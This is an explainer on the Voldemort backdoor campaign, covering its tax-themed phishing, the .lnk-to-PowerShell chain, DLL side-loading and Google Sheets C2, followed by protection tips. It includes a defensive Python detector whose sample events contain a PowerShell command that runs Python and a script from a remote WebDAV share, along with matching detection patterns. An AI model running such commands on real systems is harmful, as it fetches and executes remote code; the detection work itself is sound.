Here’s what you need to know about Voldemort Malware, how it operates, and steps you can take to protect yourself.
Another malware campaign has emerged, presenting significant risks to organizations across various sectors worldwide. Researchers have named this sophisticated malware “Voldemort.” It abuses an unexpected tool, Google Sheets, as part of its attack chain, which makes it both distinctive and hazardous.
What Is Voldemort Malware?
Voldemort is a custom backdoor malware recently discovered by cybersecurity experts.
Unlike traditional malware, Voldemort utilizes Google Sheets as its command-and-control (C2) mechanism, allowing it to communicate with its operators and receive instructions. This malware has targeted over 70 organizations across various industries, including insurance, finance, healthcare, technology, and government sectors. The campaign behind Voldemort is suspected to be part of a larger cyber espionage effort, although the exact perpetrators remain unidentified.
The Voldemort malware is particularly concerning due to its unconventional approach to spreading and executing malicious code. It impersonates tax authorities from various countries, including the U.S., U.K., and Japan, to trick recipients into clicking on links that appear legitimate but redirect them to a landing page designed to compromise their systems.
How Does Voldemort Malware Work?
The attack begins with phishing emails claiming to be from tax authorities, warning recipients about changes to their tax filings. These emails include links that, when clicked, lead to a webpage that checks whether the victim is using a Windows operating system. If the user is on Windows, the webpage serves a Windows shortcut (.lnk) file disguised as a PDF to initiate the attack.
Once the user is tricked into opening this file, a sequence of commands is triggered. The Windows shortcut file invokes PowerShell, which runs a Python script from a remote server. This script gathers system information and sends it back to the attackers. To avoid detection, the script does not download any files directly onto the victim’s computer. Instead, it loads dependencies from a WebDAV share, a technique that further obscures the attack.
The malware then displays a decoy PDF to the user to maintain the illusion of legitimacy while simultaneously downloading a password-protected ZIP file. This ZIP file contains a legitimate executable vulnerable to DLL side-loading and a malicious DLL, which is the Voldemort malware itself. Once loaded, the malware uses Google Sheets as its command-and-control channel to receive commands and exfiltrate data.
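As an added example (not code from the original post or from the researchers who named the malware), the Python check below scans constructed Sysmon-style process and network events for three signals of the chain just described: PowerShell launched with WebDAV share paths in its arguments, a Python interpreter executed directly from a WebDAV share, and a non-browser process connecting to the Google Sheets API. The event layout, host addresses, file names and browser allowlist are all assumptions made for the example.

```python
import re

# Constructed Sysmon-style events mirroring the chain described above
# (user opens a shortcut -> PowerShell -> Python from WebDAV -> sideloaded app -> Google Sheets).
# 203.0.113.10 is a documentation address; "vendor_app.exe" is a placeholder name.
SAMPLE_EVENTS = [
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden \\203.0.113.10@SSL\DavWWWRoot\py\python.exe \\203.0.113.10@SSL\DavWWWRoot\s.py"},
    {"kind": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"\\203.0.113.10@SSL\DavWWWRoot\py\python.exe",
     "cmdline": r"python.exe \\203.0.113.10@SSL\DavWWWRoot\s.py"},
    {"kind": "network", "image": r"C:\Users\alice\AppData\Local\Temp\vendor_app.exe",
     "dest": "sheets.googleapis.com", "port": 443},
    {"kind": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest": "sheets.googleapis.com", "port": 443},  # benign: a real browser
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# WebDAV-style UNC paths: \\host@SSL\..., \\host@443\..., or \\host\DavWWWRoot\...
# A plain SMB UNC path (\\server\share\...) deliberately does not match.
WEBDAV_PATH = re.compile(r"\\\\[^\\\s@]+@(ssl|\d+)\\|\\\\[^\\\s]+\\davwwwroot\\", re.IGNORECASE)
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}  # assumed allowlist
SHEETS_HOSTS = {"sheets.googleapis.com", "docs.google.com"}

def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, detail) pairs for events matching the Voldemort-style chain."""
    hits = []
    for ev in events:
        img = basename(ev["image"])
        if ev["kind"] == "process":
            if img == "powershell.exe" and WEBDAV_PATH.search(ev["cmdline"]):
                hits.append(("powershell_webdav_args", ev["cmdline"]))
            if img.startswith("python") and WEBDAV_PATH.search(ev["image"]):
                hits.append(("python_from_webdav", ev["image"]))
        elif ev["kind"] == "network":
            if ev["dest"].lower() in SHEETS_HOSTS and img not in BROWSERS:
                hits.append(("nonbrowser_google_sheets", ev["image"]))
    return hits

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The Google Sheets rule will also flag legitimate non-browser tools that use the Sheets API, so in production it is a triage signal to correlate with the other two rather than a standalone alert.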
The Significance of the Attack
The combination of advanced and basic techniques used by the Voldemort malware is particularly alarming. It employs sophisticated methods, such as abusing Google Sheets for C2 communication, while also relying on simpler tactics like phishing and using legitimate software components to evade detection. This blend of old and new tactics complicates cybersecurity experts’ efforts to fully understand the attackers’ intentions or anticipate their next move.
The campaign appears to be extensive, targeting a wide range of industries and potentially casting a broad net to gather intelligence before zeroing in on specific high-value targets. With over 20,000 phishing emails sent as part of this campaign, the scale of the operation is significant, even though the exact number of successful infections remains unclear.
How to Protect Yourself from Voldemort Malware
Until this campaign is fully shut down, it is essential to limit access to external file-sharing services as much as possible. However, the most effective defense is to strengthen the human factor, which remains a critical weak point exploited by criminals to penetrate organizations’ systems.
1. Be Cautious with Email Links: Always verify the authenticity of emails, especially those that claim to be from government agencies or other authoritative bodies. Avoid clicking on links from unknown or suspicious sources.
2. Update and Patch Software: Ensure all software, particularly security applications, is current. This includes applying patches for known vulnerabilities that malware could exploit.
3. Educate and Train Employees: Conduct regular cybersecurity training for employees to recognize phishing attempts and other common attack vectors.
4. Implement Advanced Security Measures: Use powerful threat detection and response tools that can identify and mitigate sophisticated attacks like those involving Voldemort. Network monitoring, endpoint protection, and intrusion detection systems are essential.
5. Back Up Critical Data: Regularly back up important data to reduce the impact of a potential malware attack.
Cybercriminals often prepare well-packaged bait designed to deceive victims, typically employees or operators within a company or organization, into clicking on malicious links.
Not falling into this trap is, therefore, the most effective defense. Achieving this outcome requires quality training, including continuous practical exercises and staying updated with the latest security news.